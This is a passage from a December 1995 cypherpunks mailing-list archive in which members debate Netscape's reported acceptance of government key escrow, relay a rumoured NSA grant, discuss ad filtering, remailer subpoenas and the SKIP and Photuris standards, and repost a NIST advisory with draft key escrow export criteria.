cryptosystems (best-known example, PGP) > have done. It is. You can buy if from our home page, or from most computer stores. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From nobody at REPLAY.COM Fri Dec 1 19:26:09 1995 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 1 Dec 95 19:26:09 PST Subject: A "Warning Banner" for Netscape Navigator? Good idea!Re: A "Warning Banner" for Netscape Navigator? Good idea! Message-ID: <199512020326.EAA25501@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- tcmay at got.net (Timothy C. May) wrote: >Oh, I don't have their home page enabled. What I meant, but perhaps wasn't >clear about in my post, is that the commercials pop up in Yahoo, Infoseek, >Deja News, Excite, and so forth. (OK, so it is inaccurate to say "Netscape" >puts them in.) > >Some of the ads are intertwined with the command boxes of the particular >service, and thus may be hard to excise, but others seem to be separate. > >Any ideas? > >--Tim May A while back, someone on comp.infosystems.www.* posted patches to CERN httpd allowing the proxy server to filter out url's based on regexp matching. Thus you could update a regexp file as new ads appeared. It should be fairly easy to implement something similar under Netscape 2.x using plug-ins. Anyone interested in collaborating? Wilhelm Busch -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBML/FZIiUi5SQtQ3tAQHeAAgAmtp2fF9/UzHpDIz0pOXQqZ/0U+1/vMjR jenuLn17jkgQQXAl6e617ZKMJ4h+vV8QBOh78CPaK7omV9oJyNfDRQweDBWtiFRl uEzyeUoYwGoXxkUH5ANM8AW3GaBSiQ4TCDnwZlAsJ1pYYGRgJhMtdEwPnNVAXW+l l0uODlH+ENi8hGwsM683j7gGws0cc4JcH7Ou2U9zmLZ2gHrdQsWWdw70PjhdlK7e 26aY7EGfI9pTH69mHKV60Qxj2FmSCt1v6MeHjUwRupajCNTGcnsw3FllvRJc7lug cYPApS2ychZSszUwBqoBMvJpAUSpWk+x/RfQTDeo0wsCSvwc66mhWA== =DnEr -----END PGP SIGNATURE----- From BRUEN at mitlns.mit.edu Fri Dec 1 04:49:43 1995 From: BRUEN at mitlns.mit.edu (Bob Bruen, MIT Lab for Nuclear Science) Date: Fri, 1 Dec 1995 20:49:43 +0800 Subject: nsa and netscape Message-ID: <951201073154.60201e3d@mitlns.mit.edu> The following came from a government source. I thought it might be of interest. Bob -------------------------------------------------------------------------- At yesterdays FNC (Federal Networking Council) meeting it was mentioned in passing that NSA has given Netscape a grant of $5 Million (yes $5M) to beef up the security features of Netscape. More info will be forthcoming on this. From bdavis at thepoint.net Fri Dec 1 06:07:24 1995 From: bdavis at thepoint.net (Brian Davis) Date: Fri, 1 Dec 1995 22:07:24 +0800 Subject: "Got a subpoena?" In-Reply-To: <26C7BF95B31@Novellnet.Gensys.com> Message-ID: On Thu, 30 Nov 1995, Jeff Hupp wrote: > And at that point, you shut down the remailer and log each and every > bounce. > > Now, they could get an order forcing you to run a remailer ~ but that > would open up a whole new can of worms i.e. can you be forced, under > court order, to commit a crime? No. I'm sure someone will come up with an exception, but generally no. You can't be drafted into the FBI. Then there's the 13th amendment argument ... EBD > > -- > JHupp at gensys.com |For PGP Public Key: > http://gensys.com |finger jhupp at gensys.com > Autocracy is based on the assumption that one man is wiser > than a million men. How's that again? I missed something. > > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From bdavis at thepoint.net Fri Dec 1 06:12:47 1995 From: bdavis at thepoint.net (Brian Davis) Date: Fri, 1 Dec 1995 22:12:47 +0800 Subject: Netscape gives in to key escrow In-Reply-To: <199512010307.WAA18467@homeport.org> Message-ID: On Thu, 30 Nov 1995, Adam Shostack wrote: > > One thing that stockholders do care about is liability. Its > my (non lawyerly) opinion that anyone implementing GAK without a > government mandate to do so is opening themselves up to huge liability > the Clipper database of keys gets out. Well that would depend on the terms of the agreement to hold the escrowed keys, wouldn't it? And presumably the GAK keyholder will have lawyers write the agreement so that it says, in essence, "we will try really really hard not to let the keys out, but if they get out, our only liability if to say 'Ooops' followed by a heartfelt apology!" EBD > > Adam > > -- > "It is seldom that liberty of any kind is lost all at once." > -Hume > > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From pete at loshin.com Fri Dec 1 07:02:09 1995 From: pete at loshin.com (Pete Loshin) Date: Fri, 1 Dec 1995 23:02:09 +0800 Subject: Netscape gives in to key escrow Message-ID: <01BABFD2.6307C180@ploshin.tiac.net> JR wrote: >With regard to all this waving about Netscape giving in to key scrow... > >First one question, and then some considerations. The question: > >- How much of Netscape stock is in the hands of Netscape? I mean in the hands The original IPO was for 5 million shares. The vast majority of the stock is not on the market yet. It's owned/controlled by Clark et al, and presumably a healthy share for the VC's (though I have no knowledge of their participation). -Pete Loshin pete at loshin.com From jthomas at access.digex.net Fri Dec 1 23:17:29 1995 From: jthomas at access.digex.net (Joe Thomas) Date: Fri, 1 Dec 95 23:17:29 PST Subject: A "Warning Banner" for Netscape Navigator? Good idea! In-Reply-To: <199512020326.EAA25501@utopia.hacktic.nl> Message-ID: On Sat, 2 Dec 1995, Wilhelm Busch wrote: > >Oh, I don't have their home page enabled. What I meant, but perhaps wasn't > >clear about in my post, is that the commercials pop up in Yahoo, Infoseek, > >Deja News, Excite, and so forth. (OK, so it is inaccurate to say "Netscape" > >puts them in.) > A while back, someone on comp.infosystems.www.* posted patches to CERN httpd > allowing the proxy server to filter out url's based on regexp matching. > Thus you could update a regexp file as new ads appeared. I think the author, Axel Boldt, posted this URL to cypherpunks a while back... >From http://emile.math.ucsb.edu:8000/~boldt/NoShit/index.html : Filtering the Web using WebFilter This document describes the WebFilter (formerly known as NoShit) extension to Cern's httpd web server which allows you to filter out annoying parts of web pages that you visit often. Why to use WebFilter You have probably noticed how many popular web sites that offer cool stuff sooner or later inevitably turn to advertising. They are very welcome to do that, of course, except if they try to place their shit on my computer screen. From dreschs at mpd.tandem.com Fri Dec 1 07:50:25 1995 From: dreschs at mpd.tandem.com (Sten Drescher) Date: Fri, 1 Dec 1995 23:50:25 +0800 Subject: Spam the Sign! In-Reply-To: Message-ID: <199512011529.JAA27678@galil.austnsc.tandem.com> Jeff Weinstein said: JW> jim bell wrote: >> Here's a question: Why can't Netscape be released WITHIN THE US with >> 128 bit keys? Admittedly, it would probably...uh...escape within a >> few hours, but that's no worse than what other cryptosystems >> (best-known example, PGP) have done. JW> It is. You can buy if from our home page, or from most computer JW> stores. For Linux? -- #include /* Sten Drescher */ To get my PGP public key, send me email with your public key and Subject: PGP key exchange Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3 From fletch at ain.bls.com Fri Dec 1 07:51:23 1995 From: fletch at ain.bls.com (Mike Fletcher) Date: Fri, 1 Dec 1995 23:51:23 +0800 Subject: Getting a copy of the Jim Clark speech In-Reply-To: <199512010549.VAA27874@blob.best.net> Message-ID: <9512011509.AA13878@outland> > Is there any way one could set up a dirty pictures web > page in such a fashion that it would be difficult, painful, > and impractical to get at the pictures through that page > with a netscape browser? Well, going back to the LiveScript thread, it looks as if one could very easily write a small LiveScript prog to immediately bounce NS users on to another page (such as the "Christian" Coalition's manifesto on why you shouldn't be able to look at the stuff in the first place :). Hummm, let's see how bored I get at lunch time today :). --- Fletch __`'/| fletch at ain.bls.com "Lisa, in this house we obey the \ o.O' ______ 404 713-0414(w) Laws of Thermodynamics!" H. Simpson =(___)= -| Ack. | 404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43 U ------ From clewton at netcom.com Fri Dec 1 09:41:46 1995 From: clewton at netcom.com (Charles Lewton) Date: Sat, 2 Dec 1995 01:41:46 +0800 Subject: Netscape gives in to key escrow In-Reply-To: <199511301752.MAA06161@jekyll.piermont.com> Message-ID: On Thu, 30 Nov 1995, Perry E. Metzger wrote: > > Jeff Weinstein writes: > > sameer wrote: > > > > > > http://www.cnet.com/Central/News/govt.html > > > > > > Bad. Very Bad. And I was almost starting to like Netscape. > > Jeff, I'll be blunt. > > I'm never going to use Netscape again if it turns out to be true. Sure --snip-- > Tell him that if he is being misquoted he'd better make sure that > retractions get printed and fast. --snip-- > If you don't want "Netscape Inside" to be treated as a warning label, > you guys will reject escrow as any other ethical company would -- or > else. > > Perry > Perfectly put, Perry. I have my store-bought copy of Netscape all neatly wrapped and ready to send back to them, pending only their timely response. If I do not hear them denounce GAK, then away it goes. Chuck From sameer at c2.org Fri Dec 1 09:55:55 1995 From: sameer at c2.org (sameer) Date: Sat, 2 Dec 1995 01:55:55 +0800 Subject: Barring access to Netscape In-Reply-To: <199512010917.DAA28429@snoopy.vetmed.auburn.edu> Message-ID: <199512011708.JAA27113@infinity.c2.org> > > > >Shouldn't be too hard to hack this into Apache. Should my commercial release of Apache/SSL include this? ;-) (I could make it into a configuration option, so that if the User-Agent is Mozilla, it passes Back a Refresh: header with the response....) -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From sameer at c2.org Fri Dec 1 10:06:39 1995 From: sameer at c2.org (sameer) Date: Sat, 2 Dec 1995 02:06:39 +0800 Subject: nsa and netscape In-Reply-To: <951201073154.60201e3d@mitlns.mit.edu> Message-ID: <199512011709.JAA27184@infinity.c2.org> "beef up". "Yeah, Skipjack is much more secure than RC4-40..." > > > The following came from a government source. I thought it might be of > interest. > Bob > -------------------------------------------------------------------------- > > At yesterdays FNC (Federal Networking Council) meeting it was > mentioned in passing that NSA has given Netscape a grant of $5 Million > (yes $5M) to beef up the security features of Netscape. More info will > be forthcoming on this. > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From jim at acm.org Fri Dec 1 10:06:58 1995 From: jim at acm.org (Jim Gillogly) Date: Sat, 2 Dec 1995 02:06:58 +0800 Subject: CPunks in the news: St. Jude Message-ID: <199512011712.JAA29020@mycroft.rand.org> Today's (1 Dec 95) LA Times has a writeup on female "hackers", and gives several sympathetic column-inches to St. Jude Milhon, a charter Cypherpunk. Evidently she has a new book coming out (Girls with Modems?). Jim Gillogly Sterday, 11 Foreyule S.R. 1995, 17:11 From bdavis at thepoint.net Fri Dec 1 10:09:53 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sat, 2 Dec 1995 02:09:53 +0800 Subject: I Agree buttons, GAKzilla & liability. In-Reply-To: Message-ID: On Fri, 1 Dec 1995 s1113645 at tesla.cc.uottawa.ca wrote: > On Fri, 1 Dec 1995, Brian Davis wrote: > > > Well that would depend on the terms of the agreement to hold the escrowed > > keys, wouldn't it? And presumably the GAK keyholder will have lawyers > > write the agreement so that it says, in essence, "we will try really > > really hard not to let the keys out, but if they get out, our only > > liability if to say 'Ooops' followed by a heartfelt apology!" > > > This sounds like the fine print you "agree" to by opening commercial software > packages. Hasn't this been found void in a couple of places? The "OK" or "I agree" that shrinkwrapped licenses are problematic, at best. I don't think the analogy applies, though. Maybe I'm mixing threads up, but I thought the topic was "Why would anyone agree to escrow keys commercially -- given the high risk if the keys get out?" If that is the topic, then the keys would be escrowed by one of two parties: the software developer or the customer. If the customer does it, through an active act on his part, then no problem -- he's expressly consented (not a "shrinkwrap license" problem in my view if he send them his key ...). If the software developer gives the key to the C/GAK escrow agent, then all that should be necessary is to warn the consumer that there is a backdoor through the escrowed key. Then the consumer can buy the product or not, but knows what he is getting so can make a choice. As long as the escrow aspect is not hidden, I don't see any fraud. The remedy is the marketplace. It is a long fall from $5,000,000,000 ... EBD > "I Agree" buttons I'm forced to press (but you don't *have* to download > software, nya,nya,nya...) when downloading wares also comes to mind. > Has this been tested in a court? (Sega's reverse engineering suit from > a while back comes to mind) > > Pressing buttons is hardly the same as your notarized handwritten signature > on paper (we prefer blood, it's more permanent), or its digital equivalent. > Mere tokenism, not insurance. > > > About JR's concern about Netscape's shareholders, they're playing a bubble > market and they know it. I wish them all the money and luck; luck is > something they're gonna need if this is to go on. > > Ps. Netmanage websurfer ain't so bad, hint, hint, hint (detraction time > netscape). > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From bdavis at thepoint.net Fri Dec 1 10:15:48 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sat, 2 Dec 1995 02:15:48 +0800 Subject: Netscape gives in to key escrow In-Reply-To: <199512011533.KAA19471@homeport.org> Message-ID: On Fri, 1 Dec 1995, Adam Shostack wrote: > Brian Davis wrote: > > | On Thu, 30 Nov 1995, Adam Shostack wrote: > > | > One thing that stockholders do care about is liability. Its > | > my (non lawyerly) opinion that anyone implementing GAK without a > | > government mandate to do so is opening themselves up to huge liability > | > the Clipper database of keys gets out. > > | Well that would depend on the terms of the agreement to hold the escrowed > | keys, wouldn't it? And presumably the GAK keyholder will have lawyers > | write the agreement so that it says, in essence, "we will try really > | really hard not to let the keys out, but if they get out, our only > | liability if to say 'Ooops' followed by a heartfelt apology!" > > I'm not sure thats true. Allow me to argue by analogy. > > A car company, hearing the FBI's laments about cars being used > as getaway vehicles after bank robberies, starts a program of putting > explosives in all their cars, with radio detonators. In an > unfortunate accident, some of the explosives go off for no reason, > injuring the owner of the car, etc, etc. It seems to me that the car > maker would be quite liable for doing something stupid (putting > explosives in the engine block), even though they didn't cause the > explosion. I'm presuming that the consumer is aware of the key escrow. It would indeed be foolhardy for Netscape to try to hide that, given the liability problem and the cypherpunks available to discover the "hidden" escrow. I they tell you about it and you buy it anyway -- tough luck. Same with the cars. Would *you* buy Pinto with explosives in it???? (leaving aside the "inherently dangerous" argument for the moment on the products liability claim). EBD > > Adam > > -- > "It is seldom that liberty of any kind is lost all at once." > -Hume > > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From perry at piermont.com Fri Dec 1 10:21:23 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 2 Dec 1995 02:21:23 +0800 Subject: SKIP source release is out In-Reply-To: <9512010919.AA29567@monster.incog.com> Message-ID: <199512011613.LAA08608@jekyll.piermont.com> Tom Markson writes: > > Doug Hughes writes: > [ Perry Metzger writes: ] > > > >SKIP is a non-standard being pushed by Sun. > > > > > > Correct me if I'm wrong, but isn't sun trying to make it a standard > > > (in competetion with Photuris) ? > > Doug, you are correct. SKIP is an IPSEC internet draft. Photuris is > an IPSEC internet draft. Perry is incorrect in saying that SKIP is > a non-standard. Both of the chairs of the IPSEC group have said SKIP > is part of the IPSEC working group. Yes, and I believe that it has also been made pretty clear that you have a snowball's chance in hell of getting SKIP to be a first class standard. Anything can be part of the IPSEC working group if it insists, you know. Anyone can publish an RFC, too. > Phil Karn (author of Photuris) has also said this. Other people are substantially more diplomatic than me. > Both SKIP and Photuris are on the standards track. No, I think that SKIP is pretty clearly headed, at best, to elective. It isn't ever going to be a standard, period. > > The IETF has many sorts of standards. It explicitly has a way to > > standardize things that the IETF doesn't think are a good idea but > > which should have the ability to interoperate if you do them. > > That's true, but SKIP is not in that category. Think what you like. > > My opinion is that it is fairly clear that Photuris is the key > > management system people will be using, although it is going to have > > to evolve to work with a real network wide certificate database > > infrastructure. SKIP isn't going to be the standard. > > Again, in *your* opinion. No determination has been made that I know of. Actually, Ran pretty much explicitly said in Danvers that we were headed towards Photuris and Photuris-like protocols. I know he's a bit more diplomatic about how he says such things, but again, I think that the situation is fairly clear, no matter what you guys choose to tell the trade press. Perry From alt at iquest.net Fri Dec 1 10:27:16 1995 From: alt at iquest.net (Al Thompson) Date: Sat, 2 Dec 1995 02:27:16 +0800 Subject: "Got a subpoena?" Message-ID: At 06:57 PM 11/30/95 -0500, JHupp at Gensys.Com wrote: > And at that point, you shut down the remailer and log each and every >bounce. > > Now, they could get an order forcing you to run a remailer ~ but that >would open up a whole new can of worms i.e. can you be forced, under >court order, to commit a crime? That's not how they do it. They will tell you that unless you cooperate, you will be charged for the "crime" you have been committing. Where do you think confidential informants come from? They're just people who have been caught or set up by the cops, who are trying to save their own ass. From fc at all.net Fri Dec 1 10:40:22 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Sat, 2 Dec 1995 02:40:22 +0800 Subject: Getting a copy of the Jim Clark speech In-Reply-To: <9512011509.AA13878@outland> Message-ID: <9512011550.AA06928@all.net> > > Is there any way one could set up a dirty pictures web > > page in such a fashion that it would be difficult, painful, > > and impractical to get at the pictures through that page > > with a netscape browser? > > Well, going back to the LiveScript thread, it looks as > if one could very easily write a small LiveScript prog to immediately > bounce NS users on to another page (such as the "Christian" Coalition's > manifesto on why you shouldn't be able to look at the stuff in the > first place :). Hummm, let's see how bored I get at lunch time > today :). How about a LiveScript bathing suit that covers up the interesting parts of the picture and replaces them with a statement that because they are supporting Netscape's (whatever), this part of the picture has been blanked along with indformation on where they can get an alternative free browser that will show the rest of the picture. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From dreschs at mpd.tandem.com Fri Dec 1 10:51:43 1995 From: dreschs at mpd.tandem.com (Sten Drescher) Date: Sat, 2 Dec 1995 02:51:43 +0800 Subject: key escrow compromise In-Reply-To: <199511302339.PAA01778@netcom5.netcom.com> Message-ID: <199512011721.LAA28534@galil.austnsc.tandem.com> "Vladimir Z. Nuri" said: The gist of the whole thread is that voluntary key escrow is acceptable, mandatory key escrow, which GAK apparently is, is very evil. VZN> in other words, we agree that the government does have the VZN> authority to link people to their "official numbers", but we have a VZN> choice about when to use those official numbers in any private VZN> communication, and by law businesses do not ever have to *require* VZN> authentication in this way. the numbers of course would be VZN> required in communication between the individual and government. VZN> the situation is that the government *now* requires that it knows VZN> who we are when we communicate with it in any official VZN> context. therefore I submit that the above system would not take VZN> away any rights, and in fact might lead to privacy advocates being VZN> able to use a massive government key-infrastructure but still VZN> retain communication privacy. in other words, you now have the VZN> government actually supporting your cryptographic freedom by giving VZN> you a massive "official" key distribution system you can use any VZN> way you like. No, you are not required to identify yourself to the government when communicating with it in all situations. Certainly, there are many situations when you are required to do so, but there are numerous channels in which anonyminity is permitted, and sometimes even guaranteed. Ironically, most of these are in law enforcement/public safety situations (anonymous tips, whistleblowing, etc). -- #include /* Sten Drescher */ To get my PGP public key, send me email with your public key and Subject: PGP key exchange Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3 From sameer at c2.org Fri Dec 1 10:56:00 1995 From: sameer at c2.org (sameer) Date: Sat, 2 Dec 1995 02:56:00 +0800 Subject: Barring access to Netscape In-Reply-To: Message-ID: <199512011706.JAA26955@infinity.c2.org> > The field is User-Agent. However, blocking access to users of Navigator > isn't a particularly useful thing to do. If you must do something, why > not modify your GET handler to add a header to the start of all html > pages informing people of the problem, and suggesting alternatives. I haven't modified my GET, but at the top of all the standard c2.org web pages (http://www.c2.org/) if you are using pre-1.12 netscape, it barfs at you with a nasty message. I plan on adding a line for all netscape browsers, with a link to Lance's page, once it is ready. (Maybe it is ready now, I just haven't looked yet.) > > Someone else [I can't remember, but I'll call them Alice] claimed that the > security problems showing up were part of a deliberate conspiracy. To > anyone who knows anything about the history of these things knows how > absurd this is. The principals at Netscape are a nice bunch of really > guys, but were not really up to speed on issues like security and > networking- for example, the first incarnation of SSL had an RC4 stream > running with no checksumming whatsoever. The security problems that > resulted are due to the learning curve. > > Simon > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From dreschs at mpd.tandem.com Fri Dec 1 10:56:54 1995 From: dreschs at mpd.tandem.com (Sten Drescher) Date: Sat, 2 Dec 1995 02:56:54 +0800 Subject: Netscape gives in to key escrow In-Reply-To: <199511301616.IAA18452@infinity.c2.org> Message-ID: <199512011629.KAA28071@galil.austnsc.tandem.com> Matt Miszewski said: MM> On Thu, 30 Nov 1995, sameer wrote: s> Jeff: If Netscape comes out in favor of GAK, will you leave? (Wait s> until February, at least, of course..) You don't have to answer that s> to me, or the list, just think about it, and answer it for yourself. s> Do you think "anyone else" there would leave, as you say below that s> they don't want to go down history, etc... MM> While this would go over well in the press if handled right please MM> let everyone remember that Jeff is a real person with bills to pay MM> and food to put on at least his own table. I believe that was the point: How many people at Netscape would put principled opposition to GAK ahead of expediency? My guess? Not enough. -- #include /* Sten Drescher */ To get my PGP public key, send me email with your public key and Subject: PGP key exchange Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3 From bdolan at use.usit.net Fri Dec 1 11:01:10 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Sat, 2 Dec 1995 03:01:10 +0800 Subject: I Agree buttons, GAKzilla & liability. In-Reply-To: Message-ID: FWIW: A guy from the Wall Street Journal was on the CNN biz show this morning explaining all the reasons why Netscape's stock value was supported only by religious belief. This may have a depressing effect on the stock value, as well as the morale of Netscapes major stockholders. bd On Fri, 1 Dec 1995 s1113645 at tesla.cc.uottawa.ca wrote: > On Fri, 1 Dec 1995, Brian Davis wrote: > > > Well that would depend on the terms of the agreement to hold the escrowed > > keys, wouldn't it? And presumably the GAK keyholder will have lawyers > > write the agreement so that it says, in essence, "we will try really > > really hard not to let the keys out, but if they get out, our only > > liability if to say 'Ooops' followed by a heartfelt apology!" > > > This sounds like the fine print you "agree" to by opening commercial software > packages. Hasn't this been found void in a couple of places? The "OK" or > "I Agree" buttons I'm forced to press (but you don't *have* to download > software, nya,nya,nya...) when downloading wares also comes to mind. > Has this been tested in a court? (Sega's reverse engineering suit from > a while back comes to mind) > > Pressing buttons is hardly the same as your notarized handwritten signature > on paper (we prefer blood, it's more permanent), or its digital equivalent. > Mere tokenism, not insurance. > > > About JR's concern about Netscape's shareholders, they're playing a bubble > market and they know it. I wish them all the money and luck; luck is > something they're gonna need if this is to go on. > > Ps. Netmanage websurfer ain't so bad, hint, hint, hint (detraction time > netscape). > From adam at lighthouse.homeport.org Fri Dec 1 11:06:05 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Sat, 2 Dec 1995 03:06:05 +0800 Subject: Netscape gives in to key escrow In-Reply-To: Message-ID: <199512011533.KAA19471@homeport.org> Brian Davis wrote: | On Thu, 30 Nov 1995, Adam Shostack wrote: | > One thing that stockholders do care about is liability. Its | > my (non lawyerly) opinion that anyone implementing GAK without a | > government mandate to do so is opening themselves up to huge liability | > the Clipper database of keys gets out. | Well that would depend on the terms of the agreement to hold the escrowed | keys, wouldn't it? And presumably the GAK keyholder will have lawyers | write the agreement so that it says, in essence, "we will try really | really hard not to let the keys out, but if they get out, our only | liability if to say 'Ooops' followed by a heartfelt apology!" I'm not sure thats true. Allow me to argue by analogy. A car company, hearing the FBI's laments about cars being used as getaway vehicles after bank robberies, starts a program of putting explosives in all their cars, with radio detonators. In an unfortunate accident, some of the explosives go off for no reason, injuring the owner of the car, etc, etc. It seems to me that the car maker would be quite liable for doing something stupid (putting explosives in the engine block), even though they didn't cause the explosion. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From nobody at REPLAY.COM Fri Dec 1 11:12:21 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sat, 2 Dec 1995 03:12:21 +0800 Subject: Media Advisory: GAK on Dec 5 Message-ID: <199512011626.RAA14939@utopia.hacktic.nl> Reposted for background on the Netscape $5m IOUNSA for its insecure future: Note that Messrs. Clark and Andreeson can't sell their stock until two years post IPO. ------------------ Nov. 6, 1995 Contact: Anne Enright Shepherd (301) 975-4858 anne.shepherd at nist.gov MEDIA ADVISORY U.S. GOVERNMENT SEEKS PUBLIC COMMENT ON DRAFT EXPORT CRITERIA FOR KEY ESCROW ENCRYPTION Revised proposed export criteria for software encryption products using a key escrow mechanism are now available for public review. Public comment will be solicited at a Dec. 5 meeting to be held at the Commerce Department's National Institute of Standards and Technology. Key escrow encryption is part of the Clinton Administration's initiative to promote the use of strong techniques to protect the privacy of data and voice transmissions by companies, government agencies and others without compromising the government's ability to carry out lawful electronic surveillance and to execute search warrants for electronically stored communications. The exportability criteria being proposed are for an expedited licensing review process for software key escrow encryption products with keys up to 64 bits long. The U.S. Interagency Working Group on Encryption and Telecommunications, a body that develops recommendations on Administration encryption policies, solicits additional public comment on the revised criteria. Since the Clinton Administration's Aug. 17, 1995, announcement of proposed liberalization of export control procedures for key escrow software products with key lengths up to 64 bits, the working group has met with representatives of computer hardware and software manufacturers, industry trade associations and others interested in providing strong security for electronic data and transmissions. Based on comments received to date from industry, the criteria have been revised to better reflect commercial interests while balancing the needs of law enforcement and national security. These criteria do not replace or supersede any other licensing processes or criteria. Export applications for other types of products will use the existing licensing process. The Dec. 5 meeting, to be held from 9 a.m. to 5 p.m. at NIST in Gaithersburg, Md., is free and open to the public. Representatives from the interagency encryption working group will discuss the draft criteria and answer related questions. Those interested in attending the workshop can register before Nov. 30 by sending their name, organization, postal address, phone, fax number and e-mail address to Elaine Frye of NIST by fax: (301) 948-1784 or e-mail: elaine.frye at nist.gov. For additional information, call (301) 975-2819. Once public comments are received and the export criteria are given any necessary clarifications, the Department of State is expected to issue guidance incorporating the criteria in early 1996. Products will be reviewed by the State Department to verify that they satisfy the final criteria. Products meeting the criteria will be transferred to the Commodity Control List administered by the Commerce Department's Bureau of Export Administration, where they can be exported under a general license. The revised proposed export criteria are available on the World Wide Web at http://csrc.ncsl.nist.gov/keyescrow/. Reporters may also request a copy from Anne Enright Shepherd at NIST, (301) 975-2762, fax: (301) 926-1630, or e-mail: anne.shepherd at nist.gov. ------------------- Meeting Announcement Draft 64-bit Software Key Escrow Encryption Export Criteria On December 5, 1995, the Commerce Department's National Institute of Standards and Technology (NIST) will sponsor a meeting to discuss proposed exportability criteria (11/95 version) for 64-bit software key escrow encryption. This meeting continues the industry- government dialog of an earlier NIST-sponsored meeting held in September. At that meeting, officials of the U.S. Interagency Working Group on Encryption and Telecommunications (IWG/ET) met with industry representatives and other interested parties to discuss an initial draft of these criteria. In response to comments received, the criteria have been revised with the intent of achieving commercial acceptance within the flexibility permitted by law enforcement and national security constraints. Changes to the proposed criteria have been made, and a new draft is now available for public review and comment. At the upcoming meeting, representatives from the IWG/ET will discuss the draft criteria and answer related questions. Time will follow for industry representatives and other interested parties to comment on the criteria. Also, breakout sessions will be held to discuss each criterion in greater detail. At a minimum, Government representatives are scheduled to attend from the Office of Science and Technology Policy, National Security Council, the U.S. Department of State, the U.S. Department of Justice, the U.S. Department of Commerce, the National Security Agency, and the Federal Bureau of Investigation. The meeting will be held on Tuesday, December 5, 1995 from 9:00 a.m. to 5:00 p.m. at NIST in Gaithersburg, Maryland in the Red Auditorium of the Administration Building. Please register via e-mail (to "elaine.frye at nist.gov") or via fax (301-948-1784) before November 30, 1995. To register, please provide: 1) your name, 2) organization, 3) postal address, 4) phone, 5) fax number and 6) e-mail address. Alternatively, walk-up registration will be available on-site the day of the meeting. Directions from Washington, DC: from the Beltway (I-495) take I-270 North to Exit 10 (Clopper Road). At the first traffic light (Bureau Drive), turn left into the main entrance to NIST. Follow signs to the Administration Building parking lot. The receptionist at the entrance to the Administration Building can provide directions to the Red Auditorium. If you would like to make a presentation with your comments on the proposed criteria, you are asked to contact Elaine Frye at NIST via e-mail at "elaine.frye at nist.gov" or via telephone on 301- 975-2819 by November 30, 1995. The number of presentations as well as their length may be limited. Presenters (and others wishing to distribute material) are asked to bring 250 (attendance estimate) copies of their presentations to the meeting. ----------------- Draft Software Key Escrow Encryption Export Criteria (11/95 version) Export control jurisdiction for a software key escrow encryption product that meets the following criteria, as determined by the U.S. Department of State after a one-time review, will be transferred to the U.S. Department of Commerce for export licensing. These criteria do not alter existing licensing practices applicable to other encryption products or modes. Vendors must still submit other encryption to the U.S. Department of State for review and export licensing, or jurisdiction transfer as appropriate. Vendors contemplating the development of encryption products are encouraged to discuss their export objectives with the U.S. Government. Key Escrow Feature 1. The key(s) required to decrypt the product's key escrow cryptographic functions' ciphertext shall be accessible through a key escrow feature. 2. The product's key escrow cryptographic functions shall be inoperable until the key(s) is escrowed in accordance with #3. 3. The product's key escrow cryptographic functions' key(s) shall be escrowed with escrow agent(s) certified by the U.S. Government, or certified by foreign governments with which the U.S. Government has formal agreements consistent with U.S. law enforcement and national security requirements. 4. The product's key escrow cryptographic functions' ciphertext shall contain, in an accessible format and with a reasonable frequency, the identity of the key escrow agent(s) and information sufficient for the escrow agent(s) to identify the key(s) required to decrypt the ciphertext. 5. The product's key escrow feature shall allow access to the key(s) needed to decrypt the product's ciphertext regardless of whether the product generated or received the ciphertext. 6. The product's key escrow feature shall allow for the recovery of multiple decryption keys during the period of authorized access without requiring repeated presentations of the access authorization to the key escrow agent(s). Key Length Feature 7. The product's key escrow cryptographic functions shall use an unclassified encryption algorithm with a key length not to exceed sixty-four (64) bits. 8. The product's key escrow cryptographic functions shall not provide the feature of multiple encryption (e.g., triple- DES). Interoperability Feature 9. The product's key escrow cryptographic functions shall interoperate only with key escrow cryptographic functions in products that meet these criteria, and shall not interoperate with the cryptographic functions of a product whose key escrow encryption function has been altered, bypassed, disabled, or otherwise rendered inoperative. Design, Implementation, and Operational Assurance 10. The product shall be resistant to anything that could disable or circumvent the attributes described in #1 through #9. ------------------ Background Paper Changes to the Criteria Based on Earlier Public Input The government presented draft criteria (9/95 version) for the export of software-based key escrow encryption at an open meeting at NIST on September 6-7, 1995. Meeting participants suggested several changes to the criteria; the government re-drafted the criteria as described below. Industry's ideas and words were included when possible and given serious consideration consistent with the protection of fundamental interests (e.g., privacy and national security). General changes to the document: The document was re-structured to make it clearer. After the introductory text, related criteria are grouped into the following categories: a. key escrow feature b. key length feature c. interoperability feature d. assurances Changes to the introductory text: The wording has been clarified, and additional words have been included to encourage vendors that are considering building non-escrowed encryption products to discuss 